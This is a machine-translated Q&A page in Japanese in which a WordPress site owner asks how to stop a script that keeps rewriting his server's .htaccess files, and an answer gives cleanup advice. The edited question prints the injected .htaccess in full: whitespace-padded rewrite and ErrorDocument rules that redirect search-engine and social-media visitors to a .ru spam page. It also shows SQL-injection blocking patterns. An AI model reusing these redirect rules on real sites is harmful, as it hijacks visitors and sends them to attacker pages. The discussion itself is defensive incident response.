web-dev-qa-db-ja.com

サーバー上の.htaccessファイルを変更する悪意のあるスクリプト

重複の可能性:
私のサーバーは緊急にハッキングされました

サーバーにアクセスし、ホストされているすべてのサイトの.htaccessファイルを編集してスパムリンクにリダイレクトする悪意のあるスクリプトがあるようです。

これを防ぐための最良の方法は何ですか?

コントロールパネルとFTPアクセスの両方でサーバーアクセスの詳細を変更し、次のコードで既存の.htaccessファイルを更新しようとしましたが、まだ変更されているようです。

# BEGIN WordPress

RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress

# protect wp-config.php
<files wp-config.php>
Order deny,allow
Deny from all
</files>

# Protect the htaccess file
<files .htaccess>
order allow,deny
deny from all
</files>

# protect from sql injection
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]

他に役立つものはありますか?

情報不足で申し訳ありませんが、私はサーバーなどにかなり慣れていないので、追加の詳細が必要な場合は、叫んでください!

助けてくれてありがとう。

ダン

*******編集*******

要求に応じた悪意のある.htaccess

<IfModule mod_rewrite.c>    
                                                                                                        RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|Twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
                                                                                                RewriteRule ^(.*)$ http://byidelement.ru/Ruby/index.php [R=301,L]
                                                                                    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
                                                                                                    RewriteRule ^(.*)$ http://byidelement.ru/Ruby/index.php [R=301,L]
                                                </IfModule>

    # STRONG HTACCESS PROTECTION</code>
    <Files ~ "^.*\.([Hh][Tt][Aa])">
    order allow,deny
    deny from all
    satisfy all
    </Files>
    # protect from sql injection
    Options +FollowSymLinks
    RewriteEngine On
    RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
    RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
    RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
    RewriteRule ^(.*)$ index.php [F,L]                                                                                                                                                                                                                                          
                                                                                                                            ErrorDocument 400 http://byidelement.ru/Ruby/index.php                                                                                                                      
                                                                                                                            ErrorDocument 401 http://byidelement.ru/Ruby/index.php                                                                                                                      
                                                                                                                            ErrorDocument 403 http://byidelement.ru/Ruby/index.php                                                                                                                      
                                                                                                                            ErrorDocument 404 http://byidelement.ru/Ruby/index.php                                                                                                                      
                                                                                                                            ErrorDocument 500 http://byidelement.ru/Ruby/index.php
apache-2.2.htaccesshackingmalicious
1
DanC

念のため、そこに chkrootkit を実行します。

すべてのパッケージがセキュリティ修正された最新のものであることを確認してください。

  • Ubuntu/Debian:apt-get update; apt-get dist-upgrade
  • CentOS/Fedora/RHEL:yum upgrade

これは、実行しているWordpress(またはその他の既製のフレームワーク)のバージョンでの既知のエクスプロイトである可能性がありますが、リモートで何度も悪用されていることが発見されています。 。これが当てはまる場合は、実行しているすべてのフレームワークの最新バージョンを検索し、セキュリティ修正を確認してください。

リモートで悪用されていると仮定すると、これはWebサーバーのアクセスログでtailを実行し、疑わしいアクティビティを監視することで確認できます。 tail -f /var/log/Apache2/access-logはUbuntuのストックインストールのコマンドですが、すべてのディストリビューションはApacheログを別の場所に配置します。疑わしいものを見つけると、どのVirtualHostが侵害されているかがわかります。冒険心がある場合は、過去のアクセスログもスキャンしてください。これは、トラフィックの多いサーバーでは気が遠くなる可能性がありますが、攻撃のポイントを示します。最初の攻撃が発生したことがわかっている頃を検索して、検索を絞り込みます。

2
SimonJGreen